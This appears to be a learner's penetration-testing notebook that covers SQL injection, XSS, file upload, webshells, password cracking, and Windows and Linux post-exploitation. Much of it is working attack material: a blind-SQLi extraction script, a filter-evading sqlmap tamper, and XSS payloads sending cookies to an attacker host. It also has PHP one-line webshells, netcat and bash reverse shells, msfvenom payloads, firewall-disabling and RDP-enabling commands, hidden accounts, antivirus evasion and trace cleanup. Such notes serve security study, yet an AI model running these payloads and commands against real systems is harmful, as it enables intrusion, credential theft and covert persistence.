The Road to Network Security: My Systematic Penetration Testing Learning Framework


Note: the following content only records the relevant knowledge that I did not know when I was studying. The notes are sloppy and may be wrong; for reference only. I will gradually improve them!

Basically complete penetration testing framework



mv: rename or move a file

An HTTP request contains:

Request line

Request headers

Request body

A GET request normally has no request body


1. Request parameters


501 Not Implemented (the server does not support the request method)

3xx redirect

SQL injection:

1. Detect: inject ' or " and watch for a syntax error or changed output

2. Comments: # or -- (note the space required after --)

Union query:

1. order by N to find the column count

2. union select 1,2 to find which columns are echoed on the page

3. Database: database()

4. Tables: union select table_name,2 from information_schema.tables where table_schema=database()#

5. Columns: union select column_name,2 from information_schema.columns where table_schema=database() and table_name='users'#

6. Content: union select user,password from users#

Boolean probe, one character per request: and ascii(mid((select user from users limit 0,1),1,1))>96

Boolean blind injection (brute-forcing one character per request):

and 1=1  (page renders normally)

and 1=2  (page changes or is empty)

Table exists: and exists(select * from users)

Column exists: and exists(select username from users)

Content: select user from users limit 1,2 returns two rows starting at the second row; select mid('hello world',2,1) takes one character starting at position 2 ('e')

ASCII ranges: 0-9 start at 48 (0x30); a-z start at 97 (0x61); A-Z start at 65 (0x41); select ascii('A') returns 65

URL encoding: starts with %, %20 is a space

Time-based with sleep(): select if(exists(select * from users),sleep(5),3) delays 5 seconds when the subquery returns rows
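The boolean probe above only becomes practical when it is automated: instead of guessing the character, compare its code against a midpoint and halve the range on every request, which costs seven requests per character instead of up to ninety-five. The following is an added example (not code from the original notes) that runs the page's `and ascii(mid((select user from users limit 0,1),1,1))>N` pattern against a constructed in-memory SQLite database whose query concatenates the parameter, which is the bug. SQLite spells the functions `unicode()` and `substr()` instead of MySQL's `ascii()` and `mid()`; the table names, rows and the `items` endpoint are constructed for the example. For the `sleep()` variant, `oracle()` would time the response instead of checking for a row.

```python
import sqlite3

# Constructed in-memory database standing in for the MySQL backend on the page.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE users (user TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 'p@ss'), ('tom', 'hunter2');
    CREATE TABLE items (id INTEGER, name TEXT);
    INSERT INTO items VALUES (1, 'widget');
""")
requests_sent = 0  # counts probes, to show what the extraction costs


def vulnerable_lookup(item_id: str) -> bool:
    """Models the vulnerable endpoint: the parameter is concatenated straight
    into the SQL (the bug). Returns True when the page 'renders normally',
    i.e. the query returned a row, which is all a boolean-blind attacker sees."""
    global requests_sent
    requests_sent += 1
    query = "SELECT name FROM items WHERE id = " + item_id
    return _db.execute(query).fetchone() is not None


def oracle(condition: str) -> bool:
    """One probe in the page's 'id=1 and <condition>' form."""
    return vulnerable_lookup(f"1 and ({condition})")


def binary_search(expr: str, lo: int, hi: int) -> int:
    """Recover the integer value of SQL expression `expr`, known to lie in
    [lo, hi], with 'expr > mid' probes: one bit per request instead of one
    guess per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(subquery: str, max_len: int = 64) -> str:
    """Dump the single string returned by `subquery`: first its length, then
    each character by code point (printable ASCII 32..126)."""
    length = binary_search(f"length(({subquery}))", 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # MySQL: ascii(mid((subquery),pos,1)); SQLite: unicode(substr(...))
        code = binary_search(f"unicode(substr(({subquery}), {pos}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def probes_used() -> int:
    return requests_sent


if __name__ == "__main__":
    user = extract("select user from users limit 0,1")
    pw = extract(f"select password from users where user='{user}'")
    print(f"{user}:{pw} recovered with {probes_used()} probes")
```

Each character costs about seven probes; the length search comes first so the loop knows when to stop, which the raw `>96` probe on the page cannot tell you on its own.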


3, 5, 9 questions

docker pull <image>

docker run <image>

concat('hello','world!') string concatenation

select ord(':') shows the ASCII code

hex(68) shows the hexadecimal value

group_concat(username,0x3a,password) shows all rows on one line, colon-separated

-Error-based injection:

-floor(): select count(*),concat(version(),floor(rand(0)*2)) x from information_schema.tables group by x  (the duplicate-key error leaks version())

-rand(0) is a seeded, repeatable pseudo-random sequence, which is what makes the group by collide

-updatexml(1,concat(0x7e,version(),0x7e),3): version() can be replaced by any SQL expression; the result appears in the XPath error message

-extractvalue(1,concat(0x7e,version())) works the same way

-Second-order injection (the payload is stored first and executed by a later query):

-insert into users values('admin','pwd')

-update users set pwd='123' where name='name'

-Universal password (login bypass such as admin' or '1'='1)

-File reading and writing (requires the FILE privilege, and secure_file_priv must permit the path)

-Read files

-load_file('path') with an absolute path

-/etc/passwd stores user account information

-Write files

-into outfile 'path' (writes rows as text with line terminators)

-into dumpfile 'path' (writes raw bytes, used for binary files)

-Bypass techniques

-Replace keywords: or -> ||, and -> &&

-Double writing (seselectlect): works when the filter removes a keyword only once. On the defender's side, loop until nothing more is removed, or better, use parameterised queries

-Inline comments: /*!select*/

-Space substitutes: %20, +, %2b, %a0, %0b, %09, /**/, or parentheses around expressions

-Comments: #, --+ (the + becomes a space); they close out the rest of the original query



-Basic use

1. Detect: sqlmap -u "url"
2. Databases: sqlmap -u "url" --dbs / --current-db
3. Tables: sqlmap -u "url" -D db --tables
4. Columns: sqlmap -u "url" -D db -T tb --columns
5. Content: sqlmap -u "url" -D db -T tb -C col --dump
For POST requests: sqlmap -r 1.txt (1.txt is the captured request)
sqlmap -r 1.txt -v 3 -D security    (-v raises verbosity and shows the payloads that were sent)

-Write tamper
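As an added example (not a script from the original notes, nor one shipped with sqlmap), here is a tamper script that implements the bypasses listed under "Bypass techniques": double-writing for a filter that deletes each keyword once, `and`/`or` replaced by `&&`/`||`, and spaces replaced by the inline comment `/**/`. The set of stripped keywords is an assumption, and `naive_filter`/`strict_filter` are constructed models of the target's filter so the script can be checked offline. Drop the file into sqlmap's `tamper/` directory and pass `--tamper=<name>`. A filter that loops until nothing more is removed defeats the double-writing; parameterised queries defeat all of it.

```python
#!/usr/bin/env python
"""sqlmap tamper: double-write stripped keywords, and->&&, or->||, space->/**/"""
import re

# sqlmap reads __priority__ to order tamper scripts; 0 equals PRIORITY.NORMAL in
# lib.core.enums, written as a literal here so the file also runs without sqlmap.
__priority__ = 0

# Assumption for the example: the target deletes each of these words once.
STRIPPED_KEYWORDS = ("select", "union", "where", "from")


def dependencies():
    pass


def double_write(word: str) -> str:
    """'select' -> 'selselectect': deleting one 'select' leaves 'select'."""
    half = len(word) // 2
    return word[:half] + word + word[half:]


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload it is about to send."""
    if not payload:
        return payload
    # 1. double-write the keywords the filter strips (done first, so the
    #    substitutions below do not split the doubled words)
    for kw in STRIPPED_KEYWORDS:
        payload = re.sub(rf"\b{kw}\b", lambda m: double_write(m.group(0)),
                         payload, flags=re.IGNORECASE)
    # 2. logical operators as symbols
    payload = re.sub(r"\band\b", "&&", payload, flags=re.IGNORECASE)
    payload = re.sub(r"\bor\b", "||", payload, flags=re.IGNORECASE)
    # 3. spaces as inline comments
    return payload.replace(" ", "/**/")


def naive_filter(s: str) -> str:
    """Constructed model of a weak filter: remove each keyword once.
    This is the behaviour double-writing abuses."""
    for kw in STRIPPED_KEYWORDS:
        s = re.sub(kw, "", s, count=1, flags=re.IGNORECASE)
    return s


def strict_filter(s: str) -> str:
    """Loop until no keyword remains: the defence mentioned above."""
    while True:
        stripped = naive_filter(s)
        if stripped == s:
            return s
        s = stripped
```

`tamper("-1 union select 1,2")` yields `-1/**/ununionion/**/selselectect/**/1,2`; after `naive_filter` strips one copy of each word the original `union select` is back, while `strict_filter` leaves nothing usable.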

-Command execution

-Command separators

; runs both commands in order

|| (or) runs the right side only when the left side fails

&& runs the right side only when the left side succeeds

a single & runs the left side as a background process and continues with the right side



-File inclusion

-PHP include() / require() (and the _once variants)

Example: http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd

-Whatever the suffix is, as long as the file contains PHP code it is executed when included

-php pseudo-protocols: php://filter/convert.base64-encode/resource=<file> reads source without executing it; php://input executes POSTed code (needs allow_url_include=On)

-http://localhost:8001/vulnerabilities/fi/?page=<remote URL>  remote file inclusion (needs allow_url_include=On)

-XSS (HTML/JS injection)

-JS statements

-document.cookie reads the cookie (unless it is flagged HttpOnly)

-Stored XSS

<script>document.location='http://your address/?c='+document.cookie</script>

document.write("<img src='http://your address/?c="+document.cookie+"'/>");


-File upload (capture the request, send it to Repeater, modify the suffix)

-One-line webshell

<?php @eval($_POST[1]);?>

<?php $_GET[0]($_POST[1]);?>  when connecting, append ?0=assert to the URL so that assert($_POST[1]) is called

Client tools:

AntSword

Principle: the client sends 1=@eval(base64_decode($_POST[2])); and 2=<base64 of system('ls ../');>

-Checks (and their bypasses)

-Client-side JS check: remove it, or change the suffix after the request leaves the browser

-Extension blacklist: case variation (.phP), php3, php4, php5, phtml

-.htaccess upload, content: AddType application/x-httpd-php .gif  meaning: parse .gif files as PHP

-Content type

-image/png etc. are values of the Content-Type header, which the client controls

-File header (magic bytes)

-GIF89a is the GIF file header

-File content

<?php $_GET[0]($_POST[1]);?>  with ?0=assert
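The checks in the list above (extension, Content-Type, magic bytes) are exactly what a `GIF89a<?php ...?>` polyglot is built to pass. The following is an added example, not code from the original notes, of an upload validator in two versions: `naive_accept` implements the three checks as they are usually written and accepts the polyglot; `hardened_accept` adds what actually blocks it (null bytes in the name rejected, header must match the extension, no PHP open tag anywhere in the body), and `storage_name` discards the client's filename so `.htaccess`/AddType tricks and double extensions have nothing to work with. The allowlist, signatures and sample files are constructed for the example; in production also re-encode the image and serve uploads from a path where the web server never executes scripts.

```python
import os
import re
import secrets
from typing import Optional

# Assumption for the example: an image-only upload endpoint.
ALLOWED_EXT = {".png", ".gif", ".jpg"}
MAGIC = {                               # leading bytes -> canonical extension
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\xff\xd8\xff": ".jpg",
}
# PHP open tags: <?php, short echo <?=, and the old <script language="php"> form
PHP_TAG = re.compile(rb"<\?(php|=)|<script[^>]*language\s*=\s*['\"]?php", re.I)


def normalized_ext(filename: str) -> str:
    """Lower-cased extension, so '.phP' is treated as '.php'; .jpeg -> .jpg."""
    ext = os.path.splitext(filename)[1].lower()
    return ".jpg" if ext == ".jpeg" else ext


def sniff_magic(data: bytes) -> Optional[str]:
    """Extension implied by the file header, or None for an unknown header."""
    for sig, ext in MAGIC.items():
        if data.startswith(sig):
            return ext
    return None


def naive_accept(filename: str, content_type: str, data: bytes) -> bool:
    """The three checks as commonly written. All of them are satisfied by
    'shell.gif' + 'image/gif' + b'GIF89a<?php ...?>'."""
    return (normalized_ext(filename) in ALLOWED_EXT
            and content_type.startswith("image/")      # client-controlled header
            and sniff_magic(data) is not None)


def hardened_accept(filename: str, content_type: str, data: bytes) -> bool:
    """Rejects the polyglot: the name must not carry a null byte (%00
    truncation), the header must agree with the extension, and no PHP tag
    may appear anywhere in the body."""
    if "\x00" in filename:
        return False
    if not naive_accept(filename, content_type, data):
        return False
    if sniff_magic(data) != normalized_ext(filename):
        return False
    if PHP_TAG.search(data):
        return False
    return True


def storage_name(data: bytes) -> str:
    """Server-chosen name: random stem plus the extension derived from the
    bytes, never from the client, so 'x.php.gif' or '.htaccess' cannot land.
    Call only after hardened_accept."""
    ext = sniff_magic(data)
    if ext is None:
        raise ValueError("unknown file header")
    return secrets.token_hex(16) + ext
```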

Day 6


-BeEF (browser exploitation framework)

-Blue Lotus (XSS platform)

-File inclusion

-File upload

-%00 null-byte truncation of the filename (older PHP versions)

-hashcat -a 0 -m 0 md5.hash <dictionary path>  (-a 0 dictionary attack, -m 0 raw MD5)

chown changes the owner, e.g. chown www-data upload

chgrp changes the group

reboot / shutdown -r now restarts

init 0 shuts down


-JWT: JSON Web Token

-HS256 is HMAC-SHA256

hashcat -a 0 -m 16500 <jwt file> <dictionary path>  (16500 is the JWT mode; 1450 is plain HMAC-SHA256 with the key as the password and expects hash:message input)

import base64, hashlib, hmac

def hmac_base64(key, message):
    # base64url of the raw HMAC-SHA256 digest, without padding, as in a JWT signature
    return base64.urlsafe_b64encode(hmac.new(key, message, hashlib.sha256).digest()).rstrip(b'=')
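Putting the two lines above together, here is an added example (not the notes' own code) of what HS256 actually signs and why a weak secret matters: `sign_hs256`/`verify_hs256` build and check a token, and `crack_hs256` is the offline dictionary attack that `hashcat -a 0 -m 16500` performs, run here against a constructed token and a small constructed wordlist. Once the secret is recovered any payload can be re-signed, which is the forgery the last lines show; `verify_hs256` also pins the algorithm so a header claiming `alg: none` is rejected.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    """JWT uses unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """header.payload.signature, signature = HMAC-SHA256(secret, header.payload)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Returns the payload only if the signature is valid. The algorithm is
    pinned: an attacker-supplied 'alg' ('none', or RS256 with the public key
    reused as HMAC secret) is rejected instead of being trusted from the header."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        if header.get("alg") != "HS256":
            return None
        expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s)):
            return None
        return json.loads(b64url_decode(p))
    except (ValueError, UnicodeDecodeError):   # malformed base64 or JSON
        return None


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the HMAC for each candidate secret
    and compare with the token's signature. Nothing touches the server."""
    h, p, s = token.split(".")
    message = f"{h}.{p}".encode("ascii")
    target = b64url_decode(s)
    for word in wordlist:
        digest = hmac.new(word.encode(), message, hashlib.sha256).digest()
        if hmac.compare_digest(digest, target):
            return word
    return None


if __name__ == "__main__":
    token = sign_hs256({"user": "tom", "admin": False}, b"secret")   # constructed weak secret
    found = crack_hs256(token, ["password", "123456", "secret"])    # constructed wordlist
    forged = sign_hs256({"user": "tom", "admin": True}, found.encode())
    print(found, verify_hs256(forged, b"secret"))
```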


-OWASP Top 10

-Sensitive data exposure

-Insecure deserialization

echo serialize($aaa);  (PHP: inspect the serialized form of an object)



Books: "OWASP Testing Guide"

"The Web Application Hacker's Handbook" (Chinese edition title: Hacker Attack and Defense Technology Collection - Web Actual Combat)

Websites: vulnerable practice ranges






Software websites:

Security products:

-Gateway: EW, ZPS, FS

-Endpoint: AV, patching, NAC (network access control), EDR, DLP

-Audit: log audit, database audit, VPN, bastion host

-Monitoring: APT detection, SOC, honeypot

Day 11:

-MLPS (China's Classified Protection of Cybersecurity scheme)

-php7 trojan implementation

-One-line webshell

-PoC: proof of concept

-Link layer: frame with a CRC checksum

-Network layer: packet; only a header is added

-DNS resolution uses UDP; zone transfers between servers use TCP (and responses over 512 bytes fall back to TCP)

-vi commands

-x deletes the current character

-dd deletes the current line

-comm -1 1.txt 2.txt compares two sorted files (column 1 suppressed: shows lines only in 2.txt and lines common to both)

-diff 1.txt 2.txt shows the differences

-diff -c 1.txt 2.txt shows context; -u shows the unified format that patch consumes

-vimdiff 1.txt 2.txt

-ps views processes

-tail 1.txt shows the last lines

-tail -f 1.txt follows growth at the end of the file. Saving from vim does not show up, because vim writes a new file and tail -f follows the old inode; use tail -F instead

-watch -n 5 <command> reruns the command every 5 seconds

-watch -n 5 w watches the w command

-wget downloads a file

-curl -o <file> <url> downloads a file

-Environment preparation

-ubuntu 14 / Metasploitable2

-Swiss army knife: netcat

-nc -lvp 3333 listens on a port

-nc localhost 4444 connects to a port

-n: no DNS resolution

-v: verbose

-e: program to run after connecting (not available in every nc build)

-File transfer

-Receiver: nc -lvp 4444 > 1.txt

-Sender: nc <ip/domain> <port> < 1.txt

-Bind shell (the target listens)

-Target: nc -lvp 444 -e cmd.exe

-Attacker: nc -nv <ip> <port>

-Reverse shell (the attacker listens, the target connects out; works through NAT and most egress rules)

-Attacker: nc -lvp 444

-Target: nc -nv <ip> <port> -e cmd.exe


-Information gathering

-nmap -p- -Pn -n <ip>  all TCP ports, skip host discovery, no DNS

-nmap -p 21 -sV -Pn -n --script=<name> <ip>  version detection plus an NSE script

-nmap -O <ip>  OS detection

-nmap -A -F <ip>  aggressive scan of the 100 most common ports

-nmap -Pn -n --script=ftp-vsftpd-backdoor <ip>

-Vulnerability scan

-Nessus: debian6 amd64 .deb; sudo dpkg -i ./nessusxxxx.deb; sudo service nessusd start

-web scan


-IBM appscan

-hp webinspect


-xary webscan –listen 7777 –html-output 1.html

-Combined with bp

-Set connections under user options

-destination host:ip

-proxy host:

-proxy port:7777


-whois: registration information

-Webmaster's Home (chinaz)

-Google hacking

  • site: restrict results to a domain
  • filetype: file type; a leading - sign excludes that type
  • inurl: string in the URL
  • error messages: search for leaked error text
  • GHDB (Google Hacking Database)


-Password cracking

-Generate a wordlist (social engineering dictionary)

-cewl -d 2 -m 6 -w ./1.txt <url>  (crawl depth 2, minimum word length 6)

sudo apt install crowbar

Online cracking (remote): medusa, hydra

Network services (db, ftp, ssh, rdp)

HTTP basic auth

Offline cracking (local): hashes; the hashid command identifies which kind of hash it is

-Windows hash: NT hash (NTLM)

-Tools: pwdump7 / samdump2

-SHA-512 is a hash, not encryption: there is no key and it cannot be reversed, only guessed

-Rainbow table address:

-Plaintext credentials in memory

-Other hashes


-Implementation process

Communicate with the technical contacts

-Well-known port range: 0-1023

Firewall / IPS / ICG deployment modes

-Bridge mode (transparent mode)

-In-band management

-Out-of-band management

-Routing mode (not commonly used)

-Bypass (mirror) mode

-ICG management

-Console baud rate is 9600, default login icgadmin/netentsec

-The default management address of the firewall:

Policy routing priority

-Host route -> direct route -> static route (including dynamic routes) -> policy route -> ISP route -> default route


-Vulnerability analysis / exploitation

-Application layer: web

-Generic: OWASP Top 10

-CMS: WordPress / Discuz / Joomla

-Development frameworks

-php: ThinkPHP

-java: SSM (Spring, SpringMVC, MyBatis)

-Python: Flask / Django

-General components: Elasticsearch

-Middleware: Tomcat / WebLogic

CVE / exploit-db (website) / searchsploit (its offline copy)

-Relational: MySQL, MSSQL, Oracle

-Non-relational: Redis / MongoDB

-Operating system

-Dirty COW (CVE-2016-5195, Linux kernel privilege escalation)

-Network layer:

Shell variables start with $

Fuzz: fuzz testing




who am i

Nothing is absolutely secure

GitHub: lists

Kali restart network commands

sudo systemctl restart networking

sudo systemctl restart NetworkManager



The default account password for all QiAnXin products:

Writing a one-line webshell under Linux: watch the shell escaping (quote or escape $ and the quotes)

Low privilege:

Privilege escalation:

-Exploit OS vulnerabilities

-Third-party software

exploit-db file types:

-.pl: Perl

-.rb: Ruby, generally Metasploit modules

-.c: run after compiling with gcc

-.txt/.md: write-ups, mostly webapps vulnerabilities

-Scan for admin backends

-dirb tool

Linux permissions

-rw-r--r-- 1  the number after the mode is the hard-link count; a directory's count starts at 2 because of its own . entry and its entry in the parent, and each subdirectory's .. adds one

10 characters: type, then user, group, other (rwx each)

-: ordinary file

d: directory

l: symbolic link (shortcut)

b/c: block / character device file

-rwsr-xr-x  s in the owner's execute slot is setuid: any user runs the file with the file owner's privileges

Octal representation 4755; t in the other execute slot is the sticky bit, e.g. on /tmp (only the owner may delete their own files)

There are many privilege escalation collections on GitHub for Linux and Windows

In the passwd file:

root:x:0:0:root:/root:/bin/bash  the x is a placeholder meaning the hash lives in /etc/shadow; an empty field means no password

In the shadow file:

root:!:18470:0:99999:7:::  ! (or *) means password login is locked; 18470 is the number of days since 1970-01-01 when the password was last changed

Linux firewall

View OS information:

Users (or drop-in files) added under /etc/sudoers.d can use sudo

Find setuid files: sudo find / -perm -4000 2>/dev/null

touch creates a file

echo "`command`"  backquotes mean command substitution: run the command and insert its output
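As an added example (not from the original notes) covering the permission string, the passwd line and the shadow line discussed above: `mode_to_octal` turns `ls -l` mode strings such as `-rwsr-xr-x` into `4755`, accounting for the setuid/setgid/sticky bits, `setuid_files` picks the setuid entries out of a listing the way `find / -perm -4000` would, and `parse_passwd`/`parse_shadow` split the two account lines into their fields, turning the day count into a date and reporting lock status. The passwd and shadow lines are the ones on the page; the `ls -l` lines in the test are constructed.

```python
from datetime import date, timedelta
from typing import Dict, List

EPOCH = date(1970, 1, 1)   # shadow field 3 counts days from here


def mode_to_octal(mode: str) -> str:
    """'-rwsr-xr-x' -> '4755'. Leading 4 = setuid (s in the owner execute
    slot), 2 = setgid (s in the group slot), 1 = sticky (t in the other slot).
    Upper-case S/T mean the special bit is set without the execute bit."""
    if len(mode) != 10:
        raise ValueError("expected a 10-character ls -l mode string")
    special = 0
    digits = []
    for i, triple in enumerate((mode[1:4], mode[4:7], mode[7:10])):
        r, w, x = triple
        value = (4 if r == "r" else 0) + (2 if w == "w" else 0)
        if x in "xst":              # lower-case: execute bit present
            value += 1
        if i == 0 and x in "sS":
            special += 4
        elif i == 1 and x in "sS":
            special += 2
        elif i == 2 and x in "tT":
            special += 1
        digits.append(str(value))
    return str(special) + "".join(digits)


def setuid_files(listing: List[str]) -> List[str]:
    """Names of 'ls -l' entries whose owner execute slot is s/S, i.e. what
    'find / -perm -4000' reports."""
    return [line.split()[-1] for line in listing if line[3] in "sS"]


def parse_passwd(line: str) -> Dict[str, object]:
    name, pw, uid, gid, gecos, home, shell = line.rstrip("\n").split(":")
    return {
        "name": name, "uid": int(uid), "gid": int(gid),
        "gecos": gecos, "home": home, "shell": shell,
        "hash_in_shadow": pw == "x",    # the 'x' placeholder
        "empty_password": pw == "",     # no password at all
    }


def parse_shadow(line: str) -> Dict[str, object]:
    fields = line.rstrip("\n").split(":")
    name, pw, lastchg, minage, maxage, warn = fields[:6]
    return {
        "name": name,
        "locked": pw.startswith("!") or pw == "*",
        "empty_password": pw == "",
        "last_change": EPOCH + timedelta(days=int(lastchg)) if lastchg else None,
        "min_days": int(minage) if minage else None,
        "max_days": int(maxage) if maxage else None,
        "warn_days": int(warn) if warn else None,
    }
```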


-Windows basics

Help: <command> /?

-System information

-Computer management: compmgmt.msc

-The SAM is stored in the registry (HKLM\SAM); the editor is regedit

Group policy: gpedit.msc

administrator RID 500

Guest RID 501

net user  lists users

net user <username> <password>  changes the password

net user <username> /active:yes  enables the account

See the help for the rest

Appending $ to a username hides the account from net user

net localgroup administrators  lists that group

Turn off the firewall

-net stop sharedaccess

-netsh firewall set opmode disable  (old systems)

-netsh advfirewall set allprofiles state off

-Enable RDP (3389)

reg add "HKLM\system\currentcontrolset\control\terminal server" /v fDenyTSConnections /t reg_dword /d 0 /f

-View the RDP port

-reg query "HKLM\system\currentcontrolset\control\terminal server\winstations\rdp-tcp" /v portnumber

After msfvenom generates the payload, start msfconsole and run: use exploit/multi/handler

-Command to change environment variables (export VAR=value)

su tom  switches user

-gobuster tool

nmap privilege escalation (via sudo/SUID and its interactive mode)

git privilege escalation

awk privilege escalation

msf listener: exploit/multi/handler; msfvenom generation: msfvenom -p <payload> lhost=<ip> lport=<port> -f exe -a x64 -o shell.exe

-Linux turn off the firewall

-service iptables stop

-bash -i >& /dev/tcp/<ip>/<port> 0>&1

-Port forwarding

-msf can do it (meterpreter: portfwd add -l 3389 -p 3389 -r <target ip>)

rdesktop tool command: rdesktop <ip>

Step 1: generate a reverse-connect exe with msfvenom and deliver it to the target

Step 2: msfconsole starts the handler; the target runs the exe

Step 3: after the session connects, run the remote desktop port forwarding command

Step 4: connect to your own 3389 with the rdesktop command

VM network

-host-only

Linux default proxychains config: /etc/proxychains.conf

Nmap scans should add -Pn (skip ping host discovery) because ICMP is often blocked, for example by a firewall

msf: post-exploitation

Cobalt Strike: red team

Ice Scorpion (Behinder) webshell client; Xici proxy (free proxy IP list)

Kerberos authentication in a Windows domain, golden ticket, SSO

-TGT: ticket-granting ticket

Frequently used in msf for lateral movement in a domain: search psexec


File transfer

put and get (ftp)

Build wget.ps1 line by line:

echo $webclient = New-Object System.Net.WebClient >> wget.ps1   (open a web client on Windows)

echo $url = "http://192.168.174.128:4444/hello.txt" >> wget.ps1   (file address on the Kali side)

echo $file = "exploit.txt" >> wget.ps1   (name to save as on Windows)

echo $webclient.DownloadFile($url,$file) >> wget.ps1   (download the file)

The following only works if a web service is up on Kali (e.g. python3 -m http.server 4444)

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>  or

powershell.exe -ExecutionPolicy Bypass -File <filename>

powershell.exe (new-object

AV bypass

-Signature bypass

-Sandbox / behaviour monitoring: files, registry, network connections

Shellter injects code into a normal PE file such as notepad.exe; the host must be a 32-bit program

Empire, similar to msf, is written in PowerShell, mostly PowerShell modules

Persistence

-Image hijacking (Image File Execution Options debugger key)

-Remote control trojan (RAT)



Clean up traces

Metasploitable3 target penetration

binwalk tells whether an image file is several files concatenated and separates them

knock <ip> <port...>

Check knockd.conf to see whether port knocking is in use

Command to view file attributes under Windows: attrib

Encryption under Windows: EFS and

BitLocker (full disk encryption)

icacls is the Windows command to change permissions

lsattr views file attributes under Linux

Intranet pivoting proxy (alternatives: VPN or frp)

To be continued...

